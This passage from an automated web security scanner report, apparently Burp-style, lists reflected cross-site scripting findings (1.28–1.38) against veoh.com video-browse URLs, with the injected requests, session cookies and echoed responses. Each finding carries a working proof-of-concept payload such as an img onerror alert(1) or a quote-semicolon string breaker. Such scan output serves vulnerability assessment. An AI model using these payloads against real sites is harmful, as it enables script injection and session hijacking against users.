Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 76304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea>
...[SNIP]...

1.28. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=4
Content-Length: 76350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected">
...[SNIP]...

1.29. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'b0e4a2b3cb22b22c0ca21fc59fcdbf7d',
'v20753891TQ237Z7N217c0';0ff76e45310'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.30. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected">
...[SNIP]...

1.31. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea>
...[SNIP]...

1.32. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'182e6e9265c0c89adc0076cdbb27f7c6',
'v2075425966g5b8E8134b4';0705df69313'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.33. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 76243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected">
...[SNIP]...

1.34. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 76199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea>
...[SNIP]...

1.35. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=64
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'5591f40422a84545ee8f5d97b940cf99',
'v20754927ZpAfSEztf615e';41e7360e1ba'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.36. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=19
Content-Length: 76652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea>
...[SNIP]...

1.37. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:30 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 76696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected">
...[SNIP]...

1.38. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

